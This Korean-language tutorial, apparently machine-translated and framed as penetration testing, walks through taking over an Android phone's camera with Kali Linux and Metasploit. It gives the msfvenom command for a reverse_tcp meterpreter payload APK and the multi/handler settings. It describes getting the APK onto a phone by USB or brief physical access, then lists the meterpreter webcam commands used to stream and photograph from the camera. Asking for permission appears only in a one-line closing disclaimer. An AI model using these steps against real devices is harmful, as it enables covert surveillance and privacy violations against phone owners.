해커가 안드로이드 폰 카메라를 하이재킹하여 사용자를 도청하거나 가짜 이미지를 제공했다는 뉴스가 여러 차례 있었습니다. 경보 전화 소유자는 그러한 위협 이벤트의 가능성과 실제 위험을 평가하여 이를 방지하려고 할 수 있습니다.
Kali Linux는 침투 테스트를 통해 Android 휴대폰 카메라의 잠재적인 취약성을 확인하는 최고의 도구 중 하나입니다. 전화 카메라에 원격으로 액세스하려는 해커의 시도를 파악하는 데 도움이 될 수 있습니다.
익스플로잇 페이로드 설치
침투 테스트에 Kali Linux를 사용하려면 먼저 공식 사이트에서 다운로드하십시오. 이 연습에서 사용할 "msfvenom", "msfconsole", "meterpreter" 등과 같은 다양한 전문 용어의 정의에 대해서는 이 이전 자습서를 참조하십시오.
침투 테스트의 첫 번째 단계는 장치에 표준 익스플로잇 페이로드를 설치하는 것입니다. 이를 위해 Kali Linux 터미널을 열고 다음 명령을 입력하십시오:ifconfig . 그러면 Kali Linux 세션의 IP 주소가 제공됩니다.
이제 위의 IP 주소를 사용하여 아래 표시된 명령을 입력하십시오. 익스플로잇, 트로이 목마 및 기타 취약점에 대한 포트 번호는 일반적으로 4444로 지정됩니다.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
이 단계에서는 Java 인터프리터를 기반으로 하는 metasploit 페이로드를 주입하려고 합니다. 성공하면 침투 테스트를 통해 전화기가 전화를 듣고, SMS에 액세스하고, 사용자의 위치를 파악하는 등 누군가에게 취약한지 확인하는 데 도움이 됩니다.
이 경우 공격이 잠재적으로 전화 카메라에 액세스하는 데 어떻게 사용될 수 있는지 보여주려는 시도입니다.
익스플로잇이 시작되면 "Payload"라는 APK 파일이 루트 폴더에 설치됩니다. 대상 안드로이드 폰에 설치해야 합니다. 그러나 말은 하는 것보다 쉽습니다. 대부분의 최신 Android 휴대전화와 이메일은 이러한 악성코드에 감염된 파일을 전송하는 것을 거부하며 이는 좋은 일입니다.
그러나 여전히 USB 케이블이나 임시 파일을 통해 얻을 수 있습니다. 해커가 몇 분 동안 전화기에 액세스할 수 있다면 이는 다소 취약해집니다. 이 침투 테스트에서 우리의 노력은 관련된 위험의 정확한 범위를 결정하는 것입니다.
전송이 완료되면 휴대전화에 페이로드 파일을 설치하는 방법을 찾아야 합니다. 아주 오래된 Android 버전이 아니라면 APK를 설치하기 전에 휴대전화에서 몇 가지 경고를 표시해야 합니다. 그러나 Android 휴대전화 버전에 관계없이 Android 휴대전화에 알 수 없는 출처의 앱을 설치하는 다른 방법이 많이 있습니다.
익스플로잇 시작
위의 페이로드 악용을 시작하려면 다음 명령을 삽입하십시오. msfconsole . 명령이 실행되는 데 몇 초 밖에 걸리지 않으며 휴대전화 카메라에서 추가 침투 테스트를 위해 메타스플로잇을 준비할 수 있습니다.
metasploit은 자체적으로 완전한 설명을 제공합니다. 페이로드 요약도 표시됩니다. 그것은 직장에서 익스플로잇의 수를 보여줍니다.
다음 단계에서 msfconsole은 익스플로잇을 시작할 준비가 되었습니다. 이를 위해서는 앞에서 설명한 IP 주소와 포트 번호(4444)를 참조하십시오. 따라서 다음 명령을 입력하십시오.
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]
역방향 TCP 핸들러가 활성화되면 Meterpreter가 자체적으로 실행되는 다양한 단계를 볼 수 있습니다. 대상 전화를 진단하는 동안 몇 초 동안 기다리십시오.
여기서 언급해야 할 것은 대부분의 최신 Android 휴대전화는 계속해서 이 액세스를 거부할 것이라는 점입니다. 이것은 침투 테스트임을 기억하십시오. 이 치명적인 APK 파일을 사용하여 Android 휴대전화에 침투할 수 없다면 휴대전화 제조업체가 이 특정 공격 벡터를 알고 있다는 의미입니다.
Android 휴대폰의 카메라에 액세스
전화에 익스플로잇을 성공적으로 삽입할 수 있었다면 이제 침투할 가능성이 있습니다. 그런 일이 발생하면 Kali Linux 터미널의 "미터 프리터"가 전화와의 연결을 설정할 수 있습니다. 이때 help를 삽입합니다. 공격을 받고 있는 Android 휴대전화 내의 여러 옵션에 액세스합니다.
다음 명령(도움말 메뉴에서)을 입력하여 전화기의 카메라에 액세스합니다. 이 익스플로잇에서 터미널에서 사진을 찍기 위해 후면 카메라에 액세스하려는 시도가 있었습니다.
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
성공적인 침투 테스트를 완료하려면 카메라에 액세스할 수 있게 되면 사진을 찍어 Kali Linux 루트 폴더에 저장하십시오. 저장된 다른 사진을 편집하거나 이름을 바꾸거나 삭제할 수도 있습니다. 따라서 테스트된 전화기에 대한 성공적인 침투는 실제 공격의 가능성에 대한 경고이며 보안 패치를 적용해야 할 때입니다.
이 튜토리얼에서는 침투 테스트를 위해 Kali Linux 터미널에서 Android 카메라에 액세스하는 방법을 배웠습니다.
이것은 보안 연구 기사입니다. 시연을 위해 다른 사람의 카메라에 액세스하는 경우, 물론 자신의 휴대전화가 아닌 이상 항상 먼저 허가를 받으십시오. 휴대전화의 취약점을 테스트하고 찾는 데 도움이 되는 Android용 해킹 앱을 확인하는 것을 잊지 마세요.